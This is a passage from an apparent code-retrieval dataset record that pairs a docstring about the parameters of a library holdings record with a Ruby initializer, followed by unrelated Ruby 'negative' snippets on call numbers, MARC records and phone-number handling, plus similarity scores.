\"margin-bottom: 0.5em;margin-top: 0.5em;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addInput('#{attr[\"attribute\"]}', 'text')\")\r\n firstVal = \"\"\r\n if !@submission.send(attr[\"attribute\"]).nil? && @submission.send(attr[\"attribute\"]).any?\r\n firstVal = @submission.send(attr[\"attribute\"])[0]\r\n end\r\n input_html << text_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", firstVal, :id => attr[\"attribute\"].to_s, class: \"metadataInput\")\r\n\r\n # Add field if list of metadata\r\n if !@submission.send(attr[\"attribute\"]).nil? && @submission.send(attr[\"attribute\"]).any?\r\n @submission.send(attr[\"attribute\"]).each_with_index do |metadata_val, index|\r\n if index != 0\r\n input_html << text_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", metadata_val, :id => \"submission_#{attr[\"attribute\"].to_s}\", class: \"metadataInput\")\r\n end\r\n end\r\n end\r\n\r\n input_html << content_tag(:div, \"\", id: \"#{attr[\"attribute\"]}Div\")\r\n\r\n else\r\n # if single value text\r\n # TODO: For some reason @submission.send(\"URI\") FAILS... I don't know why... so I need to call it manually\r\n if attr[\"attribute\"].to_s.eql?(\"URI\")\r\n input_html << text_field(:submission, attr[\"attribute\"].to_s.to_sym, value: @submission.URI,class: \"metadataInput\")\r\n else\r\n input_html << text_field(:submission, attr[\"attribute\"].to_s.to_sym, value: @submission.send(attr[\"attribute\"]), class: \"metadataInput\")\r\n end\r\n end\r\n return input_html\r\n end\r\n end",
"def network_objects_add_dhcp_option(rule_name,data)\n\n dhcp_list = data.split(',')\n self.msg(rule_name, :debug, 'network_objects_add_dhcp_option', \"dhcp_list\" +dhcp_list.to_s)\n \n dhcp_list.each do |dhcp|\n \n self.msg(rule_name, :debug, 'network_objects_add_dhcp_option', \"processing dhcp_option\" +dhcp.to_s)\n \n @ff.link(:href, 'javascript:mimic_button(\\'add: ...\\', 1)').click\n @ff.select_list(:name, 'net_obj_type').select_value('64')\n \n if dhcp.size > 0\n \n dhcp_opts=dhcp.split(':')\n \n if dhcp_opts[0] == \"Vendor\"\n @ff.select_list(:name, 'dhcp_opt_code').select_value('60')\n end\n \n if dhcp_opts[0] == \"Client\"\n @ff.select_list(:name, 'dhcp_opt_code').select_value('61')\n end\n \n if dhcp_opts[0] == \"User\"\n @ff.select_list(:name, 'dhcp_opt_code').select_value('77')\n end\n \n self.msg(rule_name, :debug, 'network_objects_add_dhcp_option', \"set dhcp\" +dhcp)\n \n @ff.text_field(:name, 'dhcp_opt_type').set(dhcp_opts[1].to_s)\n @ff.link(:text, 'Apply').click\n \n end # end of if\n \n end # end of each\n \n end"
] |
[
"0.55089647",
"0.51406014",
"0.51390284",
"0.5078232",
"0.4972901",
"0.49673536",
"0.4945094",
"0.48930055",
"0.4880096",
"0.48542184",
"0.48444992",
"0.4839115",
"0.48358876",
"0.48354906",
"0.48238724",
"0.48172763",
"0.4780239",
"0.47694516",
"0.4758345",
"0.4750634",
"0.47319028",
"0.4724172",
"0.47027037",
"0.46952283",
"0.46867573",
"0.4651937",
"0.46218854",
"0.46003172",
"0.45883313",
"0.45612162",
"0.45537102",
"0.45430452",
"0.4542069",
"0.453476",
"0.45283204",
"0.45275894",
"0.451212",
"0.45066217",
"0.44943863",
"0.44940865",
"0.4491605",
"0.44784802",
"0.44566807",
"0.44556427",
"0.4453646",
"0.4445582",
"0.44423226",
"0.4433579",
"0.44318026",
"0.44292793",
"0.4423425",
"0.44226947",
"0.441768",
"0.44137186",
"0.4413404",
"0.44080296",
"0.44027176",
"0.43999386",
"0.43980384",
"0.43916506",
"0.4384465",
"0.43805704",
"0.43799916",
"0.43738696",
"0.43704253",
"0.436609",
"0.43632317",
"0.43613884",
"0.43613884",
"0.43613884",
"0.43516898",
"0.43503",
"0.43350762",
"0.433189",
"0.4327193",
"0.4325474",
"0.4322644",
"0.43183726",
"0.43177834",
"0.4315271",
"0.43143007",
"0.43090996",
"0.4291695",
"0.42825115",
"0.42797402",
"0.42640597",
"0.42491364",
"0.42449847",
"0.423911",
"0.42290208",
"0.42273173",
"0.42247915",
"0.4224698",
"0.4224602",
"0.4222526",
"0.42224467",
"0.42223445",
"0.42215887",
"0.42162183",
"0.421412"
] |
0.6419283
|
0
|
Create a function which takes the file path and returns the absolute path for it.
|
# Resolve +target+ relative to this file's directory and return its absolute path.
def getPath(target)
  File.expand_path(File.join(File.dirname(__FILE__), target))
end
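
A minimal usage sketch (the relative path below is hypothetical):

# Given a file data/config.yml sitting next to this script:
getPath('data/config.yml')
# => e.g. "/home/user/project/data/config.yml"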
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_absolute_path(file)\n File.expand_path file\nend",
"def abspath(file)\n File.absolute_path(file)\nend",
"def fullpath\n File.expand_path( @file )\n end",
"def file_path\n dir_name + file_name\n end",
"def f(path)\n File.dirname(__FILE__) + \"/\" + path\nend",
"def f(path)\n File.dirname(__FILE__) + \"/\" + path\nend",
"def normalized_path(file); end",
"def file_path\n File.dirname(__FILE__) + '/' + @file_name\n end",
"def file_path(filename)\n File.join(path, filename)\n end",
"def path\n \"%s/%s\" % [dirname, filename]\n end",
"def file_path\n end",
"def file_path\n File.join(dir,filename)\n end",
"def absolute_path(path)\n path = Pathname.new(path)\n return Pathname.new(@config.base_path) + path unless path.absolute?\n path\n end",
"def absolute(file)\n if File.directory?(full_path)\n File.join(full_path, file)\n else\n full_path\n end\n end",
"def fullpath; end",
"def file_path; end",
"def absolute_path\n if is_url?\n # Use the last path component without the query string plus the name\n # of the resource in Base64. This should be both mildly readable and\n # also unique per invocation.\n url_part = URI(path).path.split(/\\//).last\n base64_name = Base64.strict_encode64(name).gsub(/\\=/, '')\n ::File.join(Chef::Config[:file_cache_path], \"#{base64_name}_#{url_part}\")\n else\n ::File.expand_path(path, Chef::Config[:file_cache_path])\n end\n end",
"def path_to_file(path)\n File.new(self.absolute_path(path))\n end",
"def absolute_path(relative_path)\n quoted_string(File.expand_path(File.join(File.dirname(options[:filename]), relative_path.value)))\n end",
"def canonicalize\n FilePath.new(File.expand_path(to_s))\n end",
"def to_abs_path\n File.expand_path(self)\n end",
"def file_path=(_arg0); end",
"def path(input_filepath)\n\t\tPathname.new(input_filepath).expand_path\n\tend",
"def absolute_path(template_name)\n File.join(@base_path, \"#{template_name}.#{TEMPLATE_EXT}\")\n end",
"def file() = pathname.relative_path_from(Cnfs.config.paths.definitions)",
"def file_path\n FileUtils.mkdir_p @path unless Dir.exist? @path\n\n @path\n end",
"def project_file(fname)\n \"#{@project_path}/#{fname}\"\nend",
"def full_path\n File.join(@path, @name)\n end",
"def file(filename) File.read(File.absolute_path(filename, File.dirname($PROGRAM_NAME))) end",
"def full_file_path\n Rails.root.join('uploads', filepath).to_s\n end",
"def full_path\n path\n end",
"def fep(file)\n return File.expand_path(file)\n end",
"def full_path\n must_be File\n File.realpath(self.path)\n end",
"def full_path; end",
"def localFile(f)\n fileUri(File::absolute_path(f))\nend",
"def get_file_path\n @path\n end",
"def fullpath\n File.join(@root, @path)\n end",
"def full_path\n \"templates/#{filename}\"\n end",
"def to_absolute_path(file, dir_str)\n Pathname.new(file).absolute? ? file : File.expand_path(file, dir_str)\n end",
"def relative_path(path)\n path = File.expand_path(File.dirname(__FILE__) + '/' + path)\n \"'#{path}'\"\nend",
"def path_to_file(file)\n # return if we already have the full file path\n return file if File.exist?(file)\n path = importerexporter.parser.path_to_files\n f = File.join(path, file)\n return f if File.exist?(f)\n raise \"File #{f} does not exist\"\n end",
"def path_to_file(file)\n # return if we already have the full file path\n return file if File.exist?(file)\n path = importerexporter.parser.path_to_files\n f = File.join(path, file)\n return f if File.exist?(f)\n raise \"File #{f} does not exist\"\n end",
"def absolute_path(path, reference = @pwd)\n path = File.expand_path(File.join(reference, path)) unless path.start_with? '/'\n path\n end",
"def get_path(filename)\n\n Pathname(__FILE__).ascend{ |directory|\n path = directory + \"ansiblealexa.yml\"; break path if path.file?\n }\n\nend",
"def file_path path\n File.join(output_path, manifest.lookup(path).split('/')[2..-1])\n end",
"def full_path=(_arg0); end",
"def file_path\n @file_path ||= lookup_file_path\n end",
"def path\n return if @file.blank?\n if is_path?\n File.expand_path(@file)\n elsif @file.respond_to?(:path) && !@file.path.blank?\n File.expand_path(@file.path)\n end\n end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def getRealPath(path) Pathname.new(path).realpath.to_s; end",
"def relative_file_path(file_path)\n file_path.gsub(/#{pwd}\\//, '')\n end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def relative_path; end",
"def absolute_file_name(filename)\n File.expand_path(filename, @base_path)\n end",
"def file_path\n dir\n end",
"def abspath(path)\n Pathname.new(File.expand_path(path)).realpath.to_s\n end",
"def original_fullpath; end",
"def path\n @file.path\n end",
"def relative_path(from, to); end",
"def full_path\n container.root.join(path)\n end",
"def full_path\n container.root.join(path)\n end",
"def file\n File.join(root, FILENAME)\n end",
"def path\n @filename\n end",
"def /(path)\n ::File.join(self, path)\n end",
"def get_full_path(sub_path)\n File.join(Dir.pwd, sub_path)\nend",
"def local_file(file)\n File.join @cwd, file\n end",
"def user_file_path(file)\n path = \"#{Settings.source_dir}/#{file}\"\n ext = \".#{Settings.partials_extension}\"\n return path if path.end_with? ext\n\n \"#{path}#{ext}\"\n end",
"def file_path(file_name, target_name=file_name, mode=0600)\r\n _package_.build_file(target_name, file_name, mode)\r\n target_path target_name\r\n end",
"def file_root(path = '')\n File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..', path))\n end",
"def abs_filepath\n @epub.manifest.abs_path_from_id(@id)\n end",
"def relative_path_from(from); end",
"def to_absolute_path\n File.join('', to.path(:default).to_s)\n end",
"def path\n @path ||= Pathname.new(dir) + filename\n end",
"def file_path(attachment_name, style=nil, full=false)\n f = __send__(attachment_name)\n return nil if f.nil?\n fn = style.nil? ? f[:name] : \"#{attachment_name}.#{style}\"\n \"#{file_root(full)}/#{fn}\"\n end",
"def absolutepath\n if absolute?\n self\n elsif to_s == \".\"\n realpath\n else\n parent.absolutepath + self.basename\n end\n end",
"def file(at_path = nil)\n at_path ||= @full_path\n File.new at_path\n end",
"def file(at_path = nil)\n at_path ||= @full_path\n File.new at_path\n end",
"def path_of(path)\n File.join(self.path, path)\n end",
"def relative_to_absolute(path)\n if Pathname.new(path).absolute?\n Pathname.new(path)\n else\n Pathname.new(\"#{Pathname.pwd}/#{path}\")\n end\n end",
"def path\n self.file.to_s\n end",
"def file_path\n File.join(AssetMapper.assets_dir, filename)\n end",
"def full_path(path)\n if path.nil?\n '<unknown>'\n else\n begin\n File.expand_path(path)\n rescue\n '<unknown>'\n end\n end\n end",
"def expand_path file\n return File.expand_path(file) if file.start_with?(\"~/\")\n return file if file[0] == '/'\n\n return File.join(@current_dir, file)\nend",
"def path\n @file\n end",
"def path\n @file\n end",
"def build_path\n end",
"def relative_path\n must_be File\n Pathname.new(self.full_path).relative_path_from(Pathname.new(Dir.pwd)).to_s\n end",
"def root_file_path; end",
"def get_file_path(filename)\n # dir = File.realdirpath(File.join(File.dirname(__FILE__), '..', 'config'))\n File.join(@dir, filename)\n end",
"def to_file_path localhost: true\n raise \"no local path for non-local URI #{to_s}\" unless local?(localhost: localhost)\n path = scrub(@path)\n #path = path.gsub(SLASH, File::SEPARATOR)\n path\n end",
"def absolute_uri_path(path)\n \"#{root_uri}#{path}\"\n end",
"def file_name_with_path\n root_path.dup + file_name\n end",
"def path\n file.url\n end",
"def filepath_to_fullpath(filepath)\n _filepath = File.expand_path(filepath)\n _rootpath = File.expand_path(self.root_dir)\n\n fullpath = _filepath.gsub(File.join(_rootpath, '/'), '')\n\n fullpath.gsub!(/^\\.\\//, '')\n\n fullpath.split('.').first.dasherize\n end",
"def figure_path(file, paths)\n if Pathname.new(file).absolute?\n return File.exist?(file) ? file : nil\n end\n\n paths.each do |possible_path|\n full_path = File.join(possible_path, file)\n return full_path if File.exist?(full_path)\n end\n nil\n end",
"def read_file(absolute_path); end",
"def path\n @file.path\n end",
"def path()\n return ::File.join(@root, @name)\n end"
] |
[
"0.8412891",
"0.821072",
"0.7324445",
"0.73212904",
"0.7315222",
"0.7315222",
"0.7308162",
"0.7263403",
"0.7250167",
"0.7238373",
"0.7202978",
"0.7187968",
"0.7182794",
"0.71440583",
"0.7138835",
"0.7130809",
"0.7114592",
"0.70815",
"0.70579493",
"0.7031415",
"0.7028479",
"0.70229423",
"0.7002664",
"0.6986028",
"0.6985274",
"0.6965166",
"0.6950696",
"0.6917545",
"0.6912967",
"0.69104886",
"0.6898361",
"0.68877333",
"0.6873645",
"0.6864612",
"0.68530536",
"0.6823969",
"0.68162966",
"0.68112886",
"0.678486",
"0.6776483",
"0.6765044",
"0.6765044",
"0.676149",
"0.6745631",
"0.6734712",
"0.673081",
"0.6730093",
"0.67195547",
"0.66985184",
"0.66985184",
"0.6697317",
"0.6690366",
"0.6690366",
"0.6690366",
"0.6690366",
"0.6690366",
"0.6672974",
"0.667049",
"0.6659134",
"0.66472036",
"0.6638146",
"0.6632605",
"0.6627601",
"0.6627601",
"0.66203094",
"0.66166234",
"0.66091967",
"0.66066504",
"0.66018784",
"0.6599237",
"0.6582422",
"0.6578456",
"0.6576164",
"0.6553734",
"0.6551361",
"0.65480757",
"0.65423894",
"0.65376645",
"0.6529212",
"0.6529212",
"0.65241575",
"0.6517769",
"0.65172255",
"0.6510894",
"0.65041935",
"0.64970124",
"0.64945847",
"0.64909923",
"0.64885044",
"0.64863026",
"0.6484485",
"0.6479485",
"0.64713955",
"0.64689803",
"0.6462279",
"0.6458297",
"0.6456096",
"0.6454483",
"0.6450218",
"0.6450124",
"0.6444404"
] |
0.0
|
-1
|
Params:
  :number (Fixnum) The 1-based sequential number representing the record's place under the bib record. (See lib/kuality_ole/data_objects/describe/marc_record.rb)
  :circulation_desk (Object) The OLE circulation desk to use. (See lib/kuality_ole/base_objects/etc/circulation_desk.rb)
  :call_number (String) The call number to use on the holdings record.
  :call_number_type (String) The holdings call number type.
  :location (String) The location for the holdings record. Defaults to a random selection from :circulation_desk. (See lib/kuality_ole/base_objects/etc/circulation_desk.rb)
|
def initialize(opts={})
  defaults = {
    :number => 1,
    :circulation_desk => CirculationDesk.new,
    :call_number => random_lcc,
    :call_number_type => 'LCC',
    :items => [ItemRecord.new]
  }
  # Caller-supplied options override the defaults.
  @options = defaults.merge(opts)
  # Select a Holdings location from the Circulation desk unless given.
  @options[:location] ||= @options[:circulation_desk].locations.sample
  set_opts_attribs(@options)
end
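
A minimal usage sketch, assuming the kuality_ole classes and helpers referenced above (CirculationDesk, ItemRecord, random_lcc, set_opts_attribs) are loaded; the class name HoldingsRecord is assumed here for illustration:

holdings = HoldingsRecord.new(:number => 2, :call_number => 'QA76.73.R83 2015')
# :call_number_type stays 'LCC' and :items keeps its single ItemRecord from the
# defaults; :location is sampled from the default CirculationDesk's locations.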
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def callnumbers_from_945(record)\n callnumbers = []\n # Get the and b values to use as alternates\n # TODO: do we need to consider other fields (e.g. 099)?\n values_090ab = []\n x090ab = extract_marc(\"090ab\", :trim_punctuation => false)\n x090ab.call(record, values_090ab, nil)\n alternate_stem = values_090ab.join(\" \")\n # Process the callnumbers in the 945\n f945 = record.select {|f| f.tag == \"945\"}\n f945.each do |f|\n a = subfield_value(f, \"a\")\n b = subfield_value(f, \"b\")\n c = subfield_value(f, \"c\")\n g = subfield_value(f, \"g\")\n callnumber = build_callnumber(a, b, c, g, alternate_stem)\n if callnumber != \"\"\n callnumbers << callnumber\n end\n end\n callnumbers\nend",
"def call_number\n call['dispCallNumber'] || fields['dispCallNumber']\n end",
"def number_fetch(number)\n Number.new(number_request(:get, \"phone-numbers/#{number}\"))\n end",
"def initialize(number)\n @raw_number = number\n @number = CnPhoneNumber.clean(number)\n # assume okay until shown otherwise\n @reason = :ok\n #puts \"number = #{@number}\"\n\n # TODO too short or too long\n\n # let's determine the basic type: landline, mobile, magic, or unknown\n # source: TODO\n if CnPhoneNumber.is_magic_number?(@number)\n @type = :magic\n # a very basic length check: at least 7 digits, assuming no area or provider code\n elsif @number.length >= 7\n if @number[0] == '1'\n # at this point, it's either: Beijing's city code, OR ...\n if @number[1] == '0'\n @type = :landline\n # no known mobile providers have '19...'\n elsif @number[1] != '9'\n @type = :mobile\n else\n @type = :unknown\n end\n else\n @type = :landline\n end\n else\n @type = :unknown\n @reason = :unknown_type\n end\n #puts \"type = #{@type}\"\n\n if @type == :mobile\n # see if we can find a provider, and strip it from @number if found\n @provider = :unknown\n @provider_number = nil\n\n # all mobile numbers must be length 11. there are two cases:\n # a) 3 digit provider code + 8 digit local extension\n # b) 4 digit provider code (134X) + 7 digit local extension\n length_check_passed = @number.length == 11\n\n if length_check_passed\n Providers.all.each_pair do | area_code, provider |\n if @number[0, area_code.length] == area_code\n @provider = provider\n @provider_number = area_code\n @number = @number[area_code.length, @number.length]\n break\n end\n end\n end\n elsif @type == :landline\n # try to find the city, and strip it from @number if found\n @city = :unknown\n @city_number = nil\n Provinces.all.each_pair do | area_code, city |\n #puts area_code, city, @number[0, area_code.length]\n # all landline numbers must be >= length 7 (minus the provider code)\n if @number[0, area_code.length] == area_code && @number.length - area_code.length >= 7\n @city = city\n @city_number = area_code\n @number = @number[area_code.length, @number.length]\n break\n end\n end\n else\n @provider = :unknown\n @provider_number = nil\n @city = :unknown\n @city_number = nil\n end\n\n end",
"def new\n @call_num = CallNum.new\n @book = Book.find(params[:book_id])\n @call_nums = CallNum.find(:all, :conditions => ['book_id = ?', @book])\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @call_num }\n end\n end",
"def get_contact_by_number(contact_number)\n get_contact(nil, contact_number)\n end",
"def get_contact_by_number(contact_number)\n get_contact(nil, contact_number)\n end",
"def book_with_number(number)\n response = request(:book_with_number, {\n \"currentInvoiceHandle\" => handle.to_hash,\n \"number\" => number\n })\n\n # Find the created Invoice\n session.invoices.find(response[:number])\n end",
"def render_call_number args, results = Array.new\n locations = [\"rx\", \"rhlrr\", \"rharr\", \"rhs2\", \"rhs2o\", \"rhs3\"]\n if args[:document][\"marc_display\"]\n MARC::XMLReader.new(StringIO.new(args[:document][\"marc_display\"])).first.find_all {|f| f.tag == '945'}.each do |field|\n results << field['a'] if locations.include?(field['l'].strip)\n end\n end\n return results.join(field_value_separator).html_safe\n end",
"def get_record(bibnumber)\n if record_exists?(bibnumber)\n marc_url = URI_FOR_MARC % ([@scope] + Array.new(3, bibnumber))\n record_url = URI_FOR_RECORD % [bibnumber, @scope]\n \n # Retrieve MARC data and convert to UTF-8 prior to decoding ...\n record_page = get_page(marc_url)\n record_data = MARC_REGEX.match(record_page)\n \n if record_data.nil?\n raise ParserError, \"Could not decode data: MARC data not found.\"\n else\n record_data = record_data[1].strip()\n record_data = Iconv.conv('UTF-8', 'LATIN1', record_data)\n end\n\n record = decode_pseudo_marc(record_data)\n unless record.nil?\n record.bibnum = bibnumber\n record.raw = record_data\n record.record_url = \"#{self.class.base_uri}#{record_url}\"\n record.marc_url = \"#{self.class.base_uri}#{marc_url}\"\n end\n return record\n else\n raise NonExistentRecordError, \"Record not found.\"\n end\n rescue NonExistentRecordError => error\n warn error.message\n return nil\n rescue ParserError => error \n warn error.message\n return nil\n end",
"def add_number\n return unless %w[techreport manual].include? @bib.type\n\n did = @bib.docidentifier.detect { |i| i.primary == true }\n did ||= @bib.docidentifier.first\n @item.number = did.id if did\n end",
"def create\n @number = Number.new(number_params)\n\n if !@number.business_number.blank?\n @number.business_number = \"+1\"+Phony.normalize(@number.business_number) \n end\n\n begin \n @client = Twilio::REST::Client.new BwCallTracking::Application.config.account_sid, BwCallTracking::Application.config.auth_token \n number = @client.account.incoming_phone_numbers.create(:area_code => @number.area_code[1..3], :voice_url => BwCallTracking::Application.config.voice_url, :status_callback => BwCallTracking::Application.config.voice_url)\n @number.tracking_number = number.phone_number\n rescue StandardError => e\n puts \"ERROR: \"+e.message \n end \n\n respond_to do |format|\n if @number.save\n format.html { redirect_to numbers_url, notice: 'Number was successfully created.' }\n format.json { render :show, status: :created, location: @number }\n else\n format.html { render :new }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @number = Number.new(number_params)\n\n if !@number.business_number.blank?\n @number.business_number = \"+1\"+Phony.normalize(@number.business_number) \n end\n\n begin \n\n numbers = Bandwidth::AvailableNumber.search_local({:area_code => @number.area_code[1..3]})\n \n if numbers.count > 0\n # buy the phone number\n number = Bandwidth::PhoneNumber.create({:number => numbers[0][:number], :applicationId => ENV[\"BANDWIDTH_APP_ID\"]})\n\n # assign the phone number to your app id\n @number.tracking_number = number.number\n @number.bw_id = number.id\n \n end\n\n rescue StandardError => e\n puts \"ERROR: \"+e.message\n raise \"There was a problem setting up your number. Try again.\" \n end \n\n respond_to do |format|\n if @number.save\n format.html { redirect_to numbers_url, notice: 'Number was successfully created.' }\n format.json { render :show, status: :created, location: @number }\n else\n format.html { render :new }\n format.json { render json: @number.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @number_call = NumberCall.new(params[:number_call])\n\n respond_to do |format|\n if @number_call.save\n format.html { redirect_to @number_call, notice: 'Number call was successfully created.' }\n format.json { render json: @number_call, status: :created, location: @number_call }\n else\n format.html { render action: \"new\" }\n format.json { render json: @number_call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def render_call_number args, results = Array.new\n locations = [\"rx\", \"rhlrr\", \"rharr\", \"rhs2\", \"rhs2o\", \"rhs3\"]\n if args[:document][\"marc_ss\"]\n MARC::XMLReader.new(StringIO.new(args[:document][\"marc_ss\"])).first.find_all {|f| f.tag == '945'}.each do |field|\n results << field['a'] if locations.include?(field['l'].strip)\n end\n end\n return results.join(field_value_separator).html_safe\n end",
"def create\n @call_num = CallNum.new(params[:call_num])\n\n respond_to do |format|\n if @call_num.save\n flash[:success] = 'Call number was successfully created.'\n format.html { redirect_to add_details_path }\n format.xml { render :xml => @call_num, :status => :created, :location => @call_num }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @call_num.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def dialNumber\n\t\tprint countryCode\n\t\tprint cityCode\n\t\tprint phoneNumber\n\tend",
"def place_recall_for(record, pickup_location_id, comment)\n recalled = false\n expire_time = (Date.today >> 1).to_time\n expire_date = \"#{expire_time.year}#{(\"%02d\" % expire_time.month)}#{(\"%02d\" % expire_time.day)}\"\n comment = CGI::escapeHTML(comment)\n \n xml = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>'\n xml += '<recall-parameters>'\n xml += \"<pickup-location>#{pickup_location_id}</pickup-location>\"\n xml += \"<last-interest-date>#{expire_date}</last-interest-date>\"\n xml += \"<dbkey>#{$libraries[record.library][\"db_key\"]}</dbkey>\"\n xml += \"<comment>#{comment}</comment>\" \n xml += '</recall-parameters>'\n \n recallable_item = record.items.reduce(nil) do |recallable_item, item|\n item.actions.reduce(recallable_item) do |recallable_item, action|\n unless recallable_item\n recallable_item = item if action.name == \"Recall\" and action.allowed\n recallable_item\n end\n recallable_item\n end\n end\n \n recall_url = \"#{recallable_item.resource_url}/recall?patron=#{self.voyager_identifier}&patron_homedb=#{self.home_db}\"\n uri = URI.parse(recall_url)\n Net::HTTP.start(uri.host, uri.port) do |http|\n headers = {'Content-Type' => 'text/xml'}\n response = http.send_request('PUT', uri.request_uri, xml, headers)\n request_info = Crack::XML.parse(response.body)\n recalled = true if request_info[\"response\"][\"reply_code\"] == \"0\"\n end\n recalled\n end",
"def set_number_record\n @number_record = NumberRecord.find(params[:id])\n end",
"def initialize(call_number)\n @call_number = call_number\n end",
"def show\n @number_call = NumberCall.find(params[:id])\n\n respond_to do |format|\n format.html # show.html.erb\n format.json { render json: @number_call }\n end\n end",
"def new\n @number_call = NumberCall.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @number_call }\n end\n end",
"def load_marc_record\n @@sierra_api = SierraApi.new unless @@sierra_api\n\n marc_record = @@sierra_api.bibs(id: @bibnumber)\n\n relavent_tags = ['245', '500', '511', '520', '521', '546']\n\n tags = {}\n marc_record.each do |i|\n tag = i['tag']\n if relavent_tags.include?(tag)\n tags[tag] = {} unless tags.key?(tag)\n\n i['data']['subfields'].each do |j|\n code = j['code']\n if tags[tag].key?(code)\n tags[tag][code] << ' ' + j['data']\n else\n tags[tag][code] = j['data']\n end\n end\n end\n end\n #pp tags\n\n # Extract fields.\n @title = tags['245']['a'].gsub(' /', '') if defined?(tags['245']['a'])\n @summary = tags['520']['a'] if defined?(tags['520']['a'])\n @cast = tags['511']['a'] if defined?(tags['511']['a'])\n @language = tags['546']['a'] if defined?(tags['546']['a'])\n @rating = tags['521']['a'] if defined?(tags['521']['a'])\n\n if tags.key?('500')\n note = tags['500'].values.join(' ')\n if match = /\\d{4}/.match(note)\n @year = match[0] if match.length == 1\n end\n end\n\n end",
"def bib_number\n get_id_from_lane_assignment(competition, heat, lane) || 0\n end",
"def place_call\n client = Twilio::REST::Client.new(Settings.twilio.account_sid, Settings.twilio.auth_token)\n params = {\n from: call.caller_id,\n to: call.member_phone_number,\n url: call_start_url(call),\n status_callback: member_call_event_url(call),\n status_callback_method: 'POST',\n status_callback_event: %w[initiated ringing answered completed]\n }\n client.calls.create params\n rescue Twilio::REST::RestError => e\n # 13223: Dial: Invalid phone number format\n # 13224: Dial: Invalid phone number\n # 13225: Dial: Forbidden phone number\n # 13226: Dial: Invalid country code\n # 21211: Invalid 'To' Phone Number\n # 21214: 'To' phone number cannot be reached\n call.action.destroy!\n call.update!(twilio_error_code: e.code, status: 'failed', action_id: nil)\n if (e.code >= 13_223 && e.code <= 13_226) || [21_211, 21_214].include?(e.code)\n add_error(:member_phone_number, I18n.t('call_tool.errors.phone_number.cant_connect'))\n else\n Rails.logger.error(\"Twilio Error: API responded with code #{e.code} for #{call.attributes.inspect}\")\n add_error(:base, I18n.t('call_tool.errors.unknown'))\n end\n end",
"def query_ol(column:, call_number:)\n result = postgres_adapter.execute(query: bib_query(column: column, call_num: call_number))\n return [] if result.empty?\n if result.first[\"title\"].match?(/^[\\d]+ titles with this call number$/)\n logger.info \" trying ol\"\n bib_numbers = query_ol_api(call_number: call_number)\n else\n bib_numbers = result.map { |h| h[\"bibid\"] }.uniq\n end\n bib_numbers\n end",
"def get_credit_note(credit_note_id_or_number)\n request_params = {}\n\n url = \"#{@xero_url}/CreditNotes/#{CGI.escape(credit_note_id_or_number)}\"\n\n response_xml = http_get(@client, url, request_params)\n\n parse_response(response_xml, {:request_params => request_params}, {:request_signature => 'GET/CreditNote'})\n end",
"def ref_number\n batch = check.batch\n facility_name = facility.name.upcase\n if (facility_name == 'AHN' || facility_name == 'SUBURBAN HEALTH' ||\n facility_name == 'UWL' || facility_name == 'ANTHEM')\n file_number = batch.file_name.split('_')[0][3..-1] rescue \"0\"\n date = batch.date.strftime(\"%Y%m%d\")\n \"#{date}_#{file_number}\"\n else\n (batch.batchid.include?(\"AH\") ? batch.batchid : batch.date.strftime(\"%Y%m%d\"))\n end\n end",
"def add_loan\n @number = params[:number]\n @loan_form_number = params[:loan_form_number]\n @delete_number = (@number.to_i - 1).to_s\n end",
"def initialize(bibnumber)\n @bibnumber = bibnumber\n\n load_marc_record\n # get_poster_url if @title and whatever other fields we need to do the search\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def set_number\n @number = Number.find(params[:id])\n end",
"def write_number(crl_number)\n @db.execute('UPDATE crl_number SET number=?', crl_number)\n end",
"def ref_number\n if ['AHN', 'SUBURBAN HEALTH', 'UWL', 'ANTHEM'].include?(@facility_name)\n file_number = @batch.file_name.split('_')[0][3..-1] rescue \"0\"\n date = @batch.date.strftime(\"%Y%m%d\")\n \"#{date}_#{file_number}\"\n else\n (@batch.batchid.include?(\"AH\") ? @batch.batchid : @batch.date.strftime(\"%Y%m%d\"))\n end\n end",
"def find_by_number(number)\n response = session.request entity_class.soap_action('FindByNumber') do\n soap.body = {\n 'number' => number\n }\n end\n\n if response == {}\n nil\n else\n debtor = build\n debtor.partial = true\n debtor.persisted = true\n debtor.handle = response\n debtor.number = response[:number].to_i\n debtor\n end\n end",
"def set_call_detail\n @call_detail = CallDetail.find(params[:id])\n end",
"def create\n @call = Call.new(call_params)\n @call.client = ClientPhone.find_by(phone: @call.phone).try(:client)\n @call.internal = Internal.find(params[:call][:internal_id])\n @call.call_type = CallType.find(params[:call][:call_type_id])\n\n respond_to do |format|\n if @call.save\n format.html { redirect_to @call, notice: 'Call was successfully created.' }\n format.json { render status: :ok, json: @call }\n else\n format.html { render :new }\n format.json { render json: @call.errors, status: :unprocessable_entity }\n end\n end\n end",
"def by_call_record_id(call_record_id)\n raise StandardError, 'call_record_id cannot be null' if call_record_id.nil?\n url_tpl_params = @path_parameters.clone\n url_tpl_params[\"callRecord%2Did\"] = call_record_id\n return MicrosoftGraph::Communications::CallRecords::Item::CallRecordItemRequestBuilder.new(url_tpl_params, @request_adapter)\n end",
"def create\n @number_record = NumberRecord.new(number_record_params)\n\n respond_to do |format|\n if @number_record.save\n format.html { redirect_to number_records_path, notice: 'Number record was successfully created.' }\n format.json { render :show, status: :created, location: @number_record }\n else\n format.html { render :new }\n format.json { render json: @number_record.errors, status: :unprocessable_entity }\n end\n end\n end",
